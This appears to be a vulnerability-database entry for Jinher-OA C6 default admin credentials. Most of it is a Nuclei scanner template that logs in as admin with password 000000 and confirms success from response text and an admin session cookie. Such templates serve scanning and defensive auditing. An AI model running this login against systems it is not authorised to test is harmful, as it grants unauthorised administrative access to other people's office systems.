jinher-oa-default-login: Jinher-OA C6 - Default Admin Discovery

日期: 2025-08-01 | 影响软件: jinher-oa | POC: 已公开

漏洞描述

Jinher-OA C6 default admin credentials were discovered.

PoC代码[已公开]

id: jinher-oa-default-login

info:
  name: Jinher-OA C6 - Default Admin Discovery
  author: ritikchaddha
  severity: high
  description: Jinher-OA C6 default admin credentials were discovered.
  reference:
    - https://github.com/nu0l/poc-wiki/blob/main/%E9%87%91%E5%92%8COA-C6-default-password.md
  classification:
    cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:C/C:L/I:L/A:L
    cvss-score: 8.3
    cwe-id: CWE-522
  metadata:
    max-request: 1
  tags: jinher,default-login,vuln

http:
  - raw:
      - |
        POST /c6/Jhsoft.Web.login/AjaxForLogin.aspx HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        type=login&loginCode={{base64("{{username}}")}}&pwd={{base64("{{password}}")}}&

    attack: pitchfork
    payloads:
      username:
        - admin
      password:
        - "000000"

    matchers-condition: and
    matchers:
      - type: word
        part: body
        words:
          - "ϵͳ¹ÜÀíÔ±|"
          - "ÄúºÃ|||"
        condition: and

      - type: word
        part: header
        words:
          - "SessionIDAdmin="

      - type: status
        status:
          - 200
# digest: 4b0a00483046022100ba4568c1950172507294153c10c74d83a64bc97a870faa778c546d725498398f022100971b93ae92f283978387cf9dfa64dd5fc4f67d97dbd126b9d3c15c502e900725:922c64590222798bb761d5b6d8e72950

相关漏洞推荐